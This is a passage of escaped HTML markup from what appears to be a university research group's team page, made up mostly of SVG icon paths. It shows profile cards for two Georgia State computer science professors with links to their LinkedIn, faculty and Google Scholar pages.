20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n       